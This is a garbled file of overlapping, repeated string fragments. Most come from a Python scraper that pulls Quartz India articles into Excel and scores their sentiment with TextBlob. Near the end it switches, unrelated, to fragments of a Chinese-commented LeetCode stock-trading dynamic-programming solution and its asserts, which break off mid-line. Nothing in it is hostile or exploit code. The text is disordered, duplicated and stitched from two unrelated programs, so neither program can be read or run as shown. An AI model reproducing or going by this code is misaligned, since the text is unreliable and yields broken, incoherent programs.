name, if there's a named author try: abody = soup.find(class_='d3284", "get article title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() #", "# combine all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs", "np from datetime import datetime from textblob import TextBlob page = requests.get('https://qz.com/india/latest') soup", "for paragraph in articletext[:-1]: # get the text only text = paragraph.get_text() paragraphtext.append(text)", "pagelinks: # store the text for each article paragraphtext = [] # get", "'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data to file", "as np from datetime import datetime from textblob import TextBlob page = requests.get('https://qz.com/india/latest')", "['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last',", "pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) #", "article page articlebody = soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] # print", "'PageLink', 'Article', 'Date'] news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True)", "thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the article myarticle = ['", "article in thearticle] # creating excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title',", "text page = requests.get(url) # parse with BFS soup = BeautifulSoup(page.text, 'html.parser') #", "= 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment analysis", "= requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = [] for", "writer.save() # performing sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article']", "import BeautifulSoup from selenium import webdriver import time import pandas as pd import", "# get article title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text()", "pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews =", "'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data", "to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news", "'html.parser') weblinks = soup.find_all('article') pagelinks = [] for link in weblinks[5:]: url =", "# store the text for each article paragraphtext = [] # get url", "'Anonymous' # get article title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle =", "'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author',", "numpy as np from datetime import datetime from textblob import TextBlob page =", "paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) #", "paragraphtext = [] # get url url = link # get page text", "page articlebody = soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] # print text", "= [] # get url url = link # get page text page", "authorname = [] title = [] thearticle = [] for link in pagelinks:", "paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the", "'.join(article) for article in thearticle] # creating excel file \"Quartz_India\" df = pd.DataFrame(columns", "excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date'])", "file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\",", "store the text for each article paragraphtext = [] # get url url", "for each article paragraphtext = [] # get url url = link #", "page = requests.get(url) # parse with BFS soup = BeautifulSoup(page.text, 'html.parser') # get", "paragraph in articletext[:-1]: # get the text only text = paragraph.get_text() paragraphtext.append(text) #", "# parse with BFS soup = BeautifulSoup(page.text, 'html.parser') # get author name, if", "data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1) data.to_excel(\"Sentiment_Analysis.xlsx\",index = False)", "combine all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to", "abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname = 'Anonymous' # get", "= pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False)", "[] for link in pagelinks: # store the text for each article paragraphtext", "= pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news", "# creating excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink',", "page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = []", "= ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save", "creating excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article',", "= 'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() #", "all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create", "page text page = requests.get(url) # parse with BFS soup = BeautifulSoup(page.text, 'html.parser')", "[' '.join(article) for article in thearticle] # creating excel file \"Quartz_India\" df =", "inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name = 'Data' writer =", "index = False) # save article data to file data = {'Title':title, 'Author':authorname,", "soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] # print text for paragraph in", "the article myarticle = [' '.join(article) for article in thearticle] # creating excel", "performing sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda", "analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity,", "import datetime from textblob import TextBlob page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser')", "soup = BeautifulSoup(page.text, 'html.parser') # get author name, if there's a named author", "'Article', 'Date'] news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index',", "oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date']", "news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True)", "selenium import webdriver import time import pandas as pd import numpy as np", "articletext = soup.find_all('p')[8:] # print text for paragraph in articletext[:-1]: # get the", "'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title',", "df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data to file data = {'Title':title,", "requests.get(url) # parse with BFS soup = BeautifulSoup(page.text, 'html.parser') # get author name,", "afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename)", "import numpy as np from datetime import datetime from textblob import TextBlob page", "authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the article myarticle = [' '.join(article)", "as pd import numpy as np from datetime import datetime from textblob import", "for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title =", "= paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle)", "= [] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = []", "= abody.get_text() except: aname = 'Anonymous' # get article title atitle = soup.find(class_=\"_21349", "each article paragraphtext = [] # get url url = link # get", "bs4 import BeautifulSoup from selenium import webdriver import time import pandas as pd", "data to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx')", "= oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name", "paragraphs to re-create the article myarticle = [' '.join(article) for article in thearticle]", "get text articletext = soup.find_all('p')[8:] # print text for paragraph in articletext[:-1]: #", "none _4ca8e\") thetitle = atitle.get_text() # get main article page articlebody = soup.find(class_='_61c55')", "india').find('a') aname = abody.get_text() except: aname = 'Anonymous' # get article title atitle", "title.append(thetitle) # join paragraphs to re-create the article myarticle = [' '.join(article) for", "in thearticle] # creating excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author'", "# get page text page = requests.get(url) # parse with BFS soup =", "re-create the article myarticle = [' '.join(article) for article in thearticle] # creating", "= soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname = 'Anonymous' # get article", "= ['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title',", "link in pagelinks: # store the text for each article paragraphtext = []", "parse with BFS soup = BeautifulSoup(page.text, 'html.parser') # get author name, if there's", "print text for paragraph in articletext[:-1]: # get the text only text =", "abody.get_text() except: aname = 'Anonymous' # get article title atitle = soup.find(class_=\"_21349 india", "import requests from bs4 import BeautifulSoup from selenium import webdriver import time import", "join paragraphs to re-create the article myarticle = [' '.join(article) for article in", "for link in pagelinks: # store the text for each article paragraphtext =", "pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news =", "to re-create the article myarticle = [' '.join(article) for article in thearticle] #", "thetitle = atitle.get_text() # get main article page articlebody = soup.find(class_='_61c55') # get", "# join paragraphs to re-create the article myarticle = [' '.join(article) for article", "data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data)", "soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = [] for link in", "from textblob import TextBlob page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks =", "writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment analysis on the", "article data to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews =", "article paragraphtext = [] # get url url = link # get page", "import pandas as pd import numpy as np from datetime import datetime from", "text only text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an article", "into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the article", "soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname = 'Anonymous' # get article title", "articletext[:-1]: # get the text only text = paragraph.get_text() paragraphtext.append(text) # combine all", "# get url url = link # get page text page = requests.get(url)", "'html.parser') # get author name, if there's a named author try: abody =", "in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = [] thearticle", "= {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols", "afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx'", "TextBlob page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks =", "# save article data to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()}", "afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name = 'Data'", "= 'Anonymous' # get article title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle", "= [] title = [] thearticle = [] for link in pagelinks: #", "import time import pandas as pd import numpy as np from datetime import", "pandas as pd import numpy as np from datetime import datetime from textblob", "get author name, if there's a named author try: abody = soup.find(class_='d3284 india').find('a')", "article myarticle = [' '.join(article) for article in thearticle] # creating excel file", "filename = 'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save()", "atitle.get_text() # get main article page articlebody = soup.find(class_='_61c55') # get text articletext", "'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data to file data =", "# performing sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] =", "= BeautifulSoup(page.text, 'html.parser') # get author name, if there's a named author try:", "# get text articletext = soup.find_all('p')[8:] # print text for paragraph in articletext[:-1]:", "title = [] thearticle = [] for link in pagelinks: # store the", "False) # save article data to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle,", "inplace=True) filename = 'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False)", "weblinks = soup.find_all('article') pagelinks = [] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0]", "= requests.get(url) # parse with BFS soup = BeautifulSoup(page.text, 'html.parser') # get author", "'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True)", "soup.find_all('p')[8:] # print text for paragraph in articletext[:-1]: # get the text only", "afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment analysis on the article data =", "url = link # get page text page = requests.get(url) # parse with", "requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = [] for link", "# get main article page articlebody = soup.find(class_='_61c55') # get text articletext =", "= [] thearticle = [] for link in pagelinks: # store the text", "get url url = link # get page text page = requests.get(url) #", "text for paragraph in articletext[:-1]: # get the text only text = paragraph.get_text()", "datetime import datetime from textblob import TextBlob page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content,", "= link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = [] thearticle = [] for", "datetime from textblob import TextBlob page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks", "textblob import TextBlob page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article')", "[] title = [] thearticle = [] for link in pagelinks: # store", "url url = link # get page text page = requests.get(url) # parse", "get main article page articlebody = soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:]", "author try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname = 'Anonymous'", "= pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment analysis on the article", "afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer,", "url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = [] thearticle = []", "= [] for link in pagelinks: # store the text for each article", "thearticle = [] for link in pagelinks: # store the text for each", "pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment analysis on the article data" ]
[ "prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution =", "len(prices) = 2 assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2, [4,1])", "0 dp_i_1 = -sys.maxsize for i in range(nLen): temp = dp_i_0 dp_i_0 =", "List[int]) -> int: def maxProfit(self, k, prices): nLen = len(prices) if nLen <=", "示例 2: # 输入: [3,2,6,5,0,3], k = 2 # 输出: 7 # 解释:", "(股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。 # 来源:力扣(LeetCode) #", "= 0) 的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 =", "prices): nLen = len(prices) if nLen <= 1 or k == 0: return", "sys class Solution: # def maxProfit(self, k: int, prices: List[int]) -> int: def", "<= 1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1, [1]) == 0) ## len(prices) =", "1 or k == 0: return 0 # k = 正无穷 if k", "3-0 = 3 。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 #", "0) ## len(prices) = 3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) == 7)", "= 3 。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 # 复杂度(时间/空间)", "assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) == 7) assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1,", "# k = 有限次数 dp_i_k_0 = [] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1", "len(prices) = 3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8])", "4 。 # 随后,在第 5 天 (股票价格 = 0) 的时候买入,在第 6 天 (股票价格", "class Solution: # def maxProfit(self, k: int, prices: List[int]) -> int: def maxProfit(self,", "# 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 # 复杂度(时间/空间) # 时间 # 空间 #", "天 (股票价格 = 6) 的时候卖出, 这笔交易所能获得利润 = 6-2 = 4 。 # 随后,在第", "= 4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。 # 示例 2: # 输入:", "= 2 assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2, [4,1]) ==", "[4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) == 0) ## len(prices)", "输出: 7 # 解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第 3 天", "dp_i_1 = -sys.maxsize for i in range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0,", "### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ### 3次交易 assert(solution.maxProfit(0,", "# desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。", "in range(1, nLen+1): for j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1])", "k = 有限次数 dp_i_k_0 = [] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 =", "= 2) 的时候买入,在第 3 天 (股票价格 = 6) 的时候卖出, 这笔交易所能获得利润 = 6-2 =", "= dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 + prices[i]) dp_i_1 = max(dp_i_1, temp -", "__author__ = xiaobao # __date__ = 2019/11/13 12:39:48 # desc: desc # 给定一个数组,它的第", "链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 # 复杂度(时间/空间) # 时间 # 空间 # 代码", "maxProfit(self, k: int, prices: List[int]) -> int: def maxProfit(self, k, prices): nLen =", "i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i", "# 解释: 在第 1 天 (股票价格 = 2) 的时候买入,在第 2 天 (股票价格 =", "的时候卖出, 这笔交易所能获得利润 = 6-2 = 4 。 # 随后,在第 5 天 (股票价格 =", "# 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。", "示例 1: # 输入: [2,4,1], k = 2 # 输出: 2 # 解释:", "3) assert(solution.maxProfit(2, [4,1]) == 0) ## len(prices) = 3 assert(solution.maxProfit(1, [1,4,8]) == 7)", "# 输入: [2,4,1], k = 2 # 输出: 2 # 解释: 在第 1", "的时候买入,在第 2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。 #", "= 有限次数 dp_i_k_0 = [] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = []", "== 0) assert(solution.maxProfit(1, [1]) == 0) ## len(prices) = 2 assert(solution.maxProfit(1, [1,4]) ==", "天 (股票价格 = 0) 的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 =", "(股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。 # 示例 2: #", "== 4) assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) == 0) ## len(prices) >=", "# 输出: 2 # 解释: 在第 1 天 (股票价格 = 2) 的时候买入,在第 2", "== 3) assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2, [4,1]) == 0) ## len(prices) =", "个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1:", "2 assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2, [4,1]) == 0)", "。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 # 复杂度(时间/空间) # 时间", "0) 的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3", "== 7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) == 7) assert(solution.maxProfit(1, [4,8,1]) ==", "desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意:", "7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) == 7) assert(solution.maxProfit(1, [4,8,1]) == 4)", "2) 的时候买入,在第 3 天 (股票价格 = 6) 的时候卖出, 这笔交易所能获得利润 = 6-2 = 4", "for i in range(1, nLen+1): for j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j]", "[4,1]) == 0) ## len(prices) = 3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4])", "4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ### 3次交易", "i in range(1, nLen+1): for j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] +", "2) 的时候买入,在第 2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。", "-sys.maxsize for i in range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 +", "= Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1, [1]) ==", "k, prices): nLen = len(prices) if nLen <= 1 or k == 0:", "-> int: def maxProfit(self, k, prices): nLen = len(prices) if nLen <= 1", "## len(prices) = 3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1,", "8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(5, [7,1,5,3,6,4,7]) == 10)", "(股票价格 = 2) 的时候买入,在第 2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2 =", "# 示例 2: # 输入: [3,2,6,5,0,3], k = 2 # 输出: 7 #", "12:39:48 # desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k", "dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution = Solution() ## len(prices) <=", "for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1))", "j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize", "天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。 # 来源:力扣(LeetCode)", "[1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7)", "著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 # 复杂度(时间/空间) # 时间 # 空间 # 代码 import sys", "temp - prices[i]) return dp_i_0 # k = 有限次数 dp_i_k_0 = [] for", "len(prices) >= 4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5])", "= 4-2 = 2 。 # 示例 2: # 输入: [3,2,6,5,0,3], k =", "== 7) assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) ==", "for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0] =", "这笔交易所能获得利润 = 3-0 = 3 。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 #", "= xiaobao # __date__ = 2019/11/13 12:39:48 # desc: desc # 给定一个数组,它的第 i", "# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 # 复杂度(时间/空间) # 时间 # 空间 # 代码 import", "dp_i_k_1[i][0] = -sys.maxsize for i in range(1, nLen+1): for j in range(k,0,-1): dp_i_k_0[i][j]", "2 # 输出: 2 # 解释: 在第 1 天 (股票价格 = 2) 的时候买入,在第", "dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return", "### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) ==", "-sys.maxsize for i in range(1, nLen+1): for j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j],", "import sys class Solution: # def maxProfit(self, k: int, prices: List[int]) -> int:", "== 0) ## len(prices) = 3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) ==", "dp_i_1 = max(dp_i_1, temp - prices[i]) return dp_i_0 # k = 有限次数 dp_i_k_0", "输入: [3,2,6,5,0,3], k = 2 # 输出: 7 # 解释: 在第 2 天", "assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) == 7) assert(solution.maxProfit(1,", "== 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1,", "== 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(5, [7,1,5,3,6,4,7]) ==", "assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2, [4,1]) == 0) ##", "3 天 (股票价格 = 6) 的时候卖出, 这笔交易所能获得利润 = 6-2 = 4 。 #", "0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10)", "== 3) assert(solution.maxProfit(1, [8,4,1]) == 0) ## len(prices) >= 4 ### 0次交易 assert(solution.maxProfit(1,", "max(dp_i_0, dp_i_1 + prices[i]) dp_i_1 = max(dp_i_1, temp - prices[i]) return dp_i_0 #", "(股票价格 = 6) 的时候卖出, 